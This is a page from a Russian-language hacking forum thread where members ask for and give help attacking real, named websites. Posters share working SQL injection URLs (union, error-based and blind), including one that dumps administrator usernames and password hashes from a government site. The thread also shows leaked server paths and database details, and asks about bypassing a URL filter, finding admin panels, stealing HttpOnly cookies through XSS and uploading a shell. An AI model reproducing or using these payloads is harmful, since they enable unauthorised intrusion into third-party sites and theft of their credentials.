Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    нет:

    Code:
    http://www.4ips.biz/products.php?id=71+or+1=1+union+select+1,2,3,4+limit+0,1
    
    to use near 'ORDER BY [b]pics_db[/b].pics_id DESC'
    
    а названия столбцов только брутить (как и остальных таблиц), кроме столбца pics_id:
    Code:
    http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+pics_id+from+pics_db+limit+0,1),floor(rand(0)*2))+from+pics_db+group+by+2+limit+0,1)a)
    
     
    1 person likes this.
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Можна не знать названия таблицы и какую нить ин-ию вытащить ис переменных и функций! ​
    Code:
    _http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)
    Есть admin_db, но там скорее одна запись || пустая -> ошибку не выплевывает!
    Вот еще путь выдрал, если надо!
    HTML:
    Unable to save result set in /hsphere/local/home/sitang/4ips.biz/products.php on line 57
     
    #12102 Strilo4ka, 1 Apr 2010
    Last edited: 1 Apr 2010
    1 person likes this.
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    у мну вот такая проблема.. есть уязвимость MSSQL..
    и стоит защита типа на SELECT,VERSION,TABLE идт..
    с SELECT все испробовал идет тока ('sel'+'ect')
    как дальше я хД
    всевремя перекидует на www.site.ru/Rejected-By-UrlScan/?~/products.asp?cat=select

    з.ы (('sel'+'ect')+top+1+???+FROM+INFORMATION _SCHEMA.????)
     
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 попугай
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    используют это http://www.codenet.ru/webmast/iis/htm/core/iiacnsc.php#NTFSpermissions
     
  6. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Есть такая скуль
    __http://www.ykjw.gov.cn/newsinfo.php?id=-214+union+select+1,group_concat(concat(uid,0x3a,pwd)),3,4,5,6+from+administrator

    никак не могу админку найти
    доступ к mysql.user закрыт и file_priv=NO
    как тут можно выкрутиться?
     
  7. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего.

    Заранее спасибо
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://rapidshare.com/files/273513716/adminfinder.rar.html
     
    _________________________
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    link was dead!

    try this one

    http://uploading.com/files/KCDVDDST/adminfinder.rar.html
     
    _________________________
  10. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Yes, thanks, good program, but dont help me with my site...
     
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите определить версию БД

    http://www.opderschmelz.lu/index.php?id=10;event=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)


    http://www.opderschmelz.lu/admin/

    набираю 'or+5=5/*

    не проходит
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    _http://www.opderschmelz.lu/index.php?id=10;event=415+and+5=@@version
    5 ветка!
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.opderschmelz.lu/index.php?id=10;event=415+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+limit+1,1/*
    
    5.0.32-Debian_7etch10-log
    
     
  14. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

    http://www.lavozindependiente.com/news.php?nid=517'

    Что то сам пытался..

    http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=false

    http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=true
     
  15. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    10
    Reputations:
    1
    Вопрос по XSS
    Подскажите как можно получить все куки, если часть куков имеют флаг HttpOnly, и javascript не может получить доступ к ним.
    Пробовал использовать обьект XMLHttpRequest, но и он не может извлечь куки.
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5
    
    @@tmpdir: /tmp
    @@basedir: /usr/
    version(): 5.1.44
    @@datadir: /var/lib/mysql/
    @@version_compile_os: redhat-linux-gnu
    user(): [email protected]
    database(): lavozi_lavozindependiente_com_-_db
    
    дальше сложнее, т.к. и union и select фильтруются неподецки
     
    1 person likes this.
  17. SnooPy

    SnooPy New Member

    Joined:
    16 Dec 2009
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Здравствуйте есть скуля http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+id,2,3,4,5,6,7+FROM+'Users'+limit+1,1/*
    через INFORMATION_SCHEMA.TABLES нашел табл. users пытаюсь вывести не хочет выводить может прав нету или она в другой бд висит?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+count(id),2,3,4,5,6,7+from+users/*
    
    1 - запись только. Users в кавычки брать не надо
     
  19. SnooPy

    SnooPy New Member

    Joined:
    16 Dec 2009
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    спасибо) но так не интересно была бы бд общая)
     
  20. SnooPy

    SnooPy New Member

    Joined:
    16 Dec 2009
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    http://cstrike.freearena.ru/stats/cs/Classic/index.php тут шелл залить никак нельзя?
     
Thread Status:
Not open for further replies.